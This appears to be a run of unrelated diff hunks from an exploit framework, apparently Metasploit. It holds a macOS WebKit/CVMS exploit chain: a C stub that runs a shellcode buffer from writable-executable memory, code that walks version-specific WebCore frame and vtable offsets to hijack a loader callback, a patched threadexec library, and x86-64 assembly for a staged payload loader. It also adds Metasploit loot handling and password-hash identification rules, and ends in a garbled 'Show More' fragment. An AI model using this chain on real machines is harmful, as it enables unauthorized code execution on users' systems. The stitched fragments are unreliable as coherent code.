+		if (root_payload[0] == 'R' &&
+			root_payload[1] == 'O' &&
+			root_payload[2] == 'O' &&
+			root_payload[3] == 'T') {
+			/*system("open /System/Applications/TextEdit.app");*/
+			/*system("open /System/Applications/Calculator.app");*/
+			return;
+		}
+    void *ptr = mmap(0, sizeof(root_payload), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+    if (ptr == MAP_FAILED) {
+        return;
+    }
+    memcpy(ptr, root_payload, sizeof(root_payload));
+    int (*sc)() = ptr;
+    sc();
+  }
+}
+
+
+int main() {
+	run_payload();
+	return 0;
+}
@@ -0,0 +1,83 @@
+#include <stdio.h>
+#include <pthread.h>
+#include <stdlib.h>
+#include <sys/sysctl.h>
+#define WEBCORE_EXPORT
+#include "ResourceError.h"
+#import <CoreFoundation/CFError.h>
+#import <Foundation/Foundation.h>
+#include <wtf/URLParser.h>
+#import <wtf/BlockObjCExceptions.h>
+#import <wtf/NeverDestroyed.h>
+
+namespace WTF {
+}
+
+namespace WebCore {
+	String getNSURLErrorDomain()
+	{
+	    static const NeverDestroyed<String> errorDomain(NSURLErrorDomain);
+	    return errorDomain.get();
+	}
+}
+
+using namespace WebCore;
+
+class Client {
+public:
+};
+
+class Document {
+};
+
+template<typename T>
+class Wrapper {
+public:
+	void *a, *b, *type;
+	T *wrapped;
+};
+
+__asm__(".quad 0x13371337, 0\njmp _main");
+
+void *cvm_main(void *);
+
+extern "C"
+int main(int, char **args) {
+
+	uint64_t document_addr = (uint64_t)((Wrapper<Document> *)args[0])->wrapped;
+
+	char product[256] = {0};
+	size_t strsize = sizeof(product);
+	int ret = sysctlbyname("kern.osproductversion", product, &strsize, NULL, 0);
+
+	// 10.15.4
+	uint64_t frame_offset = 0x160;
+	uint64_t loader_offset = 0x88;
+	uint64_t vtable_offset = 0x138;
+	if (!strcmp(product, "10.15.3")) {
+		frame_offset = 0x1a0;
+		loader_offset = 0x98;
+		vtable_offset = 0x140;
+	}
+
+	uint64_t frame = (uint64_t)*(uint64_t*)(document_addr + frame_offset);
+	uint64_t loaderptr = (uint64_t)*(uint64_t*)(frame + loader_offset);
+	uint64_t clientuint = (uint64_t)*(uint64_t*)(loaderptr + 8);
+	uint64_t clientvftable = (uint64_t)*(uint64_t*)clientuint;
+	void* func_ptr = (void*)*(uint64_t*)(clientvftable + vtable_offset);
+	Client* client = (Client*)clientuint;
+	pthread_t thread;
+	pthread_create(&thread, NULL, cvm_main, NULL);
+	pthread_join(thread, NULL);
+
+	char buf[0x400] = "file:///var/db/CVMS/m.app";
+
+	ResourceError error(getNSURLErrorDomain(), -1101, {{}, buf}, "yee");
+
+	typedef void (*t_dispatchDidFailProvisionalLoad)(Client *self, ResourceError &error, bool continueLoading);
+	t_dispatchDidFailProvisionalLoad WebFrameLoaderClient_dispatchDidFailProvisionalLoad = (t_dispatchDidFailProvisionalLoad)func_ptr;
+
+	WebFrameLoaderClient_dispatchDidFailProvisionalLoad(client, error, true);
+	sleep(8);
+	return 0;
+}
@@ -0,0 +1,56 @@
+diff -bur threadexec-orig/src/thread_call.c threadexec/src/thread_call.c
+--- threadexec-orig/src/thread_call.c	2020-03-13 21:38:03.000000000 -0400
+++ threadexec/src/thread_call.c	2020-03-13 20:16:57.000000000 -0400
+@@ -17,6 +17,7 @@
+ #if __arm64__
+ 	impl = thread_save_state_arm64;
+ #endif
+	return NULL;
+ 	if (impl == NULL) {
+ 		DEBUG_TRACE(1, "%s: No implementation available for this platform", __func__);
+ 		return false;
+@@ -31,6 +32,7 @@
+ #if __arm64__
+ 	impl = thread_restore_state_arm64;
+ #endif
+	return NULL;
+ 	if (impl == NULL) {
+ 		DEBUG_TRACE(1, "%s: No implementation available for this platform", __func__);
+ 		return false;
+diff -bur threadexec-orig/src/threadexec_call.c threadexec/src/threadexec_call.c
+--- threadexec-orig/src/threadexec_call.c	2020-03-13 21:38:03.000000000 -0400
+++ threadexec/src/threadexec_call.c	2020-03-13 20:16:57.000000000 -0400
+@@ -4,6 +4,7 @@
+ #include "tx_log.h"
+ 
+ #include <assert.h>
+#include <stdio.h>
+ 
+ bool
+ threadexec_call_fast(threadexec_t threadexec, void *result, size_t result_size,
+@@ -57,6 +58,7 @@
+ 	size_t shmem_position = 0;
+ 	for (size_t i = 0; i < argument_count; i++) {
+ 		enum threadexec_value_disposition disposition = arguments[i].disposition;
+		printf("%d\n", disposition);
+ 		switch (disposition) {
+ 			case TX_DISPOSITION_LITERAL:
+ 				literal_arguments[i].value = arguments[i].value;
+diff -bur threadexec-orig/src/tx_call.c threadexec/src/tx_call.c
+--- threadexec-orig/src/tx_call.c	2020-03-13 21:38:03.000000000 -0400
+++ threadexec/src/tx_call.c	2020-03-13 20:16:57.000000000 -0400
+@@ -10,10 +10,10 @@
+ tx_preserve(threadexec_t threadexec) {
+ 	assert(threadexec->preserve_state == NULL && threadexec->thread != MACH_PORT_NULL);
+ 	const void *state = thread_save_state(threadexec->thread);
+-	if (state == NULL) {
+-		ERROR("Could not preserve thread 0x%x", threadexec->thread);
+-		return false;
+-	}
+	// if (state == NULL) {
+	// 	ERROR("Could not preserve thread 0x%x", threadexec->thread);
+	// 	return false;
+	// }
+ 	threadexec->preserve_state = state;
+ 	return true;
+ }
@@ -0,0 +1,49 @@
+BITS 64
+
+mov rbp, [rsp + 0x28]
+add rbp, 0x10
+
+; rsi = argv[0] (stage1_arr)
+mov rax, [rbp]
+; esi = stage1_arr.length
+mov esi, [rax + 0x18]
+
+mov edi, 0
+mov edx, 7
+mov ecx, 0x1802
+mov r8d, -1
+mov r9, 0
+
+push rbx
+push rcx
+push rbp
+push r10
+push r12
+push r13
+push r14
+push r15
+
+mov     eax, 20000C5h
+mov     r10, rcx
+syscall
+
+pop r15
+pop r14
+pop r13
+pop r12
+pop r10
+pop rbp
+pop rcx
+pop rbx
+
+push rax
+mov rdi, rax
+; rsi = argv[0] (stage1_arr)
+mov rax, [rbp]
+; ecx = stage1_arr.length
+mov ecx, [rax + 0x18]
+; rsi = stage1_arr.vector
+mov rsi, [rax + 0x10]
+cld
+rep movsb
+ret
@@ -4,7 +4,10 @@ module LootDataProxy
    begin
      self.data_service_operation do |data_service|
        if !data_service.is_a?(Msf::DBManager)
-          opts[:data] = Base64.urlsafe_encode64(opts[:data].empty? ? "" : opts[:data].join('')) if opts[:data] and opts[:data].kind_of?(Array) else opts[:data]
+          unless opts[:data].nil?
+            opts[:data] = opts[:data].join if opts[:data].kind_of?(Array)
+            opts[:data] = Base64.urlsafe_encode64(opts[:data]) unless opts[:data].empty?
+          end
        end
        add_opts_workspace(opts)
        data_service.report_loot(opts)
@@ -42,6 +42,20 @@ def identify_hash(hash)
      return 'des,crypt'
    when hash =~ /^\$dynamic_82\$[\da-f]{128}\$HEX\$[\da-f]{32}$/ # jtr vmware ldap https://github.com/rapid7/metasploit-framework/pull/13865#issuecomment-660718108
      return 'dynamic_82'
+    when hash.start_with?(/{SSHA}/i)
+      return 'ssha'
+    when hash.start_with?(/{SHA512}/i)
+      return 'raw-sha512'
+    when hash.start_with?(/{SHA}/i)
+      return 'raw-sha1'
+    when hash.start_with?(/{MD5}/i)
+      return 'raw-md5'
+    when hash.start_with?(/{SMD5}/i)
+      return 'smd5'
+    when hash.start_with?(/{SSHA256}/i)
+      return 'ssha256'
+    when hash.start_with?(/{SSHA512}/i)
+      return 'ssha512'
    # windows
    when hash.length == 65 && hash =~ /^[\da-fA-F]{32}:[\da-fA-F]{32}$/ && hash.split(':').first.upcase == 'AAD3B435B51404EEAAD3B435B51404EE'
      return 'nt'
@@ -91,6 +105,12 @@ def identify_hash(hash)
    # other
    when hash =~ /^<\d+@.+?>#[\w]{32}$/
      return 'hmac-md5'
+    when hash.length == 114 && hash.start_with?('$M$')
+      return 'F5-Secure-Vault'
+    when hash =~ /^M\$[[:print:]]+#[\da-fA-F]{32}(?:(?::[[:print:]]*$)|$)/
+      return 'mscash'
+    when hash =~ /^\$DCC2\$\d+#[[:print:]]+#[\da-fA-F]{32}(?:(?::[[:print:]]*$)|$)/
+      return 'mscash2'
  end
  ''
 end
--- a/Show More
+++ b/Show More